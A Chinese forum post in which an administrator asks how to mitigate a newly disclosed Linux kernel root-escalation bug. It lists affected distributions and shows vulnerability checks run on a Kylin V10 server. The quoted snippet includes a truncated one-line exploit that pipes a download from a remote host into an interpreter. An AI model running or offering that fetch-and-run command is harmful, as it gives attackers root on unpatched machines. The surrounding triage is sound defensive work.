今天收到部门通告,说有新发现的Linux内核漏洞,正好也看到了佬友发的帖子:
[image] 今天刚刚公布了一个 CVE-2026-31431 普通用户直接一行命令直接提权至root 这次POC发的非常早 导致绝大多数日用系统都还没有修复 包括 ubuntu 24 lts, debian 12 13 等 个人测试已经在多个大型项目的系统中复现 以下为非root执行后 直接拥有root权限 ~$ curl https://copy.fail/exp | p…
看了一下后发现目前通报的受影响的发行版:
- Ubuntu 24.04 LTS
- Amazon Linux 2023
- Red Hat Enterprise Linux 10
- Red Hat Enterprise Linux 9
- Red Hat Enterprise Linux 8
- SUSE 16
没有提及国产OS,目前部门内有用到Kylin V10的服务器,麒麟官网目前没有发布相关漏洞信息,按照腾讯云发布的排查方法排查了下,发现内核(4.19.90)可能是受影响版本,系统启用了模块加载但没有加载受影响模块。
腾讯云通告链接:
https://cloud.tencent.com/announce/detail/2277
排查方法: (点击了解更多详细信息)排查结果:
[~]# uname -r
4.19.90-89.11.v2401.ky10.x86_64
[~]# grep CONFIG_CRYPTO_USER_API_AEAD /boot/config-$(uname -r)
CONFIG_CRYPTO_USER_API_AEAD=m
[~]# lsmod | grep algif
[~]# python3 -c "import socket; socket.socket(38,5,0); print('VULNERABLE')"
VULNERABLE
请问各位佬友,目前应该如何处理呢,像通告里的禁用内核模块的缓解措施可以吗?
5 个帖子 - 3 位参与者